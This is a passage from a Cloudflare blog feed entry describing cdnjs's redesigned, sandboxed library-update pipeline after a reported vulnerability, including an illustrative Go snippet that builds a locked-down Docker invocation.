            </figure><p>First, to detect new library versions, two daemons (one for npm-based updates and one for git-based updates) run regularly. Once a new version has been detected, its files are downloaded as an archive and placed into the incoming storage bucket.</p><p>Writing a new version to the incoming bucket triggers a function that adds all the information we need to update the library. The function also generates a signed URL that allows writing to the outgoing bucket, but only in a specific folder for the given library, reducing the blast radius. Finally, a message is placed into a queue to indicate that the new version of the given library is ready to be published.</p><p>A daemon listens for incoming messages and spawns an unprivileged Docker container to handle dangerous operations (archive extraction, minification, and compression). After the sandbox exits, the daemon uses the signed URL to store the processed files in the outgoing storage bucket.</p><p>Finally, multiple daemons are triggered when the finalized package is written to the outgoing bucket. These daemons publish the assets to cdnjs.cloudflare.com and to the main <a href="https://github.com/cdnjs/cdnjs">cdnjs repository</a>. The daemons also publish the version-specific URL, cryptographic hash, and other information to Workers KV, cdnjs.com, and the <a href="https://cdnjs.com/api">API</a>.</p><p>In this revised design, exploiting a similar vulnerability would only grant access within the sandbox (Docker container). The attacker would have access to the container’s files, but nothing else. The container is minimal, ephemeral, has no secrets included, and is dedicated to a single library update, so it cannot affect other libraries’ files.</p>
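            <p>The sandboxing step can be sketched as the argument list for an ephemeral, locked-down <code>docker run</code> invocation. This is a hedged illustration of the design, not cdnjs’ actual configuration; the image name <code>cdnjs-process</code> and the mount paths are hypothetical:</p>

```go
package main

import "fmt"

// sandboxArgs builds a docker invocation that runs the dangerous steps
// (archive extraction, minification, compression) in a throwaway,
// unprivileged container with no network and no secrets mounted.
func sandboxArgs(archivePath, outDir string) []string {
	return []string{
		"run",
		"--rm",                  // ephemeral: container is removed on exit
		"--network", "none",     // no network access inside the sandbox
		"--user", "65534:65534", // run as nobody, never root
		"--read-only",           // root filesystem is read-only
		"--cap-drop", "ALL",     // drop all Linux capabilities
		"-v", archivePath + ":/in/pkg.tgz:ro", // archive mounted read-only
		"-v", outDir + ":/out",                // only /out is writable
		"cdnjs-process:latest",                // hypothetical processing image
		"/in/pkg.tgz", "/out",
	}
}

func main() {
	fmt.Println(sandboxArgs("/srv/incoming/lib-1.2.3.tgz", "/srv/work/lib"))
}
```

            <p>Pairing an invocation like this with a per-library output folder matches the blast-radius idea above: even a fully compromised container can only write into one library’s directory for one update.</p>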
    <div>
      <h3>Our Commitment to Security</h3>
      <a href="#our-commitment-to-security">
        
      </a>
    </div>
    <p>Beyond maintaining a vulnerability disclosure program, we regularly perform internal security reviews and hire third-party firms to audit the software we develop. But it is through our vulnerability disclosure program that we receive some of the most interesting and creative reports. Each report has helped us improve the security of our services. In this case, we worked with RyotaK not only to address the vulnerability, but also to ensure that his blog post was detailed and accurate. We invite anyone who finds a security issue in any of Cloudflare’s services to report it to us through <a href="https://hackerone.com/cloudflare">HackerOne</a>.</p> ]]></content:encoded>
            <category><![CDATA[CDNJS]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Bug Bounty]]></category>
            <guid isPermaLink="false">666ctQ9OY5rCiI6GZyKm9G</guid>
            <dc:creator>Jonathan Ganz</dc:creator>
            <dc:creator>Thomas Calderon</dc:creator>
            <dc:creator>Sven Sauleau</dc:creator>
        </item>
    </channel>
</rss>